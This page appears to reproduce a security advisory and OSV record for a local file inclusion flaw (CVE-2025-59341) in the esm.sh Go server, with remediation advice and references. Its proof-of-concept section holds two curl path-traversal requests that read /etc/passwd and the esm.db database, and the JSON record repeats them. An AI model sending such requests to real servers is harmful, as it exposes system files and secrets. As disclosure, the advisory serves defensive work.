ghsa-49pv-gwxp-532r
Vulnerability from github
Published
2025-09-17 18:39
Modified
2025-09-26 16:14
Severity ?
7.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
Summary
esm.sh has File Inclusion issue
Details

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise. Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168

Proof of Concept

  1. Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json

```json { "port": 9999, "npmRegistry": "https://registry.npmjs.org/", "npmToken": "**" }

```

  1. Trigger the LFI vulnerability by sending this command below to read a local file

```bash

read /etc/passwd

curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'

or read the database esm.db file

curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1' ```

poc-image

Remediation

Simply remove any .. in the URL path before actually process the file. See more details in this guide

Credits

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/esm-dev/esm.sh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "136"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59341"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-17T18:39:20Z",
    "nvd_published_at": "2025-09-17T18:15:53Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).\n\n**Severity:** High \u2014 LFI can expose secrets, configuration files, credentials, or enable further compromise.\n**Impact:** reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.\n\nVulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168\n\n---\n\n## Proof of Concept\n\n1. Using this default config file that I copy from the repo, the server is running at  `http://localhost:9999` with this command `go run server/esmd/main.go --config=config.json`\n\n\n```json\n{\n  \"port\": 9999,\n  \"npmRegistry\": \"https://registry.npmjs.org/\",\n  \"npmToken\": \"******\"\n}\n\n```\n\n2. Trigger the LFI vulnerability by sending this command below to read a local file\n\n```bash\n# read /etc/passwd\ncurl --path-as-is \u0027http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1\u0026module=1\u0027\n\n# or read the database esm.db file\ncurl --path-as-is \u0027http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1\u0026module=1\u0027\n```\n\n\u003cimg width=\"3338\" height=\"1906\" alt=\"poc-image\" src=\"https://github.com/user-attachments/assets/f3721e5d-a09c-4227-960a-35279ff52811\" /\u003e\n\n\n---\n\n## Remediation\n\nSimply remove any `..` in the URL path before actually process the file. See more details in [this guide](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n\n## Credits\n\n- [Ai Ho (Jessie)](https://github.com/j3ssie)\n- [CL Yang](https://github.com/A11riseforme)",
  "id": "GHSA-49pv-gwxp-532r",
  "modified": "2025-09-26T16:14:27Z",
  "published": "2025-09-17T18:39:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-49pv-gwxp-532r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59341"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/commit/492de92850dd4d350c8b299af541f87541e58a45"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/esm-dev/esm.sh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3962"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "esm.sh has File Inclusion issue"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.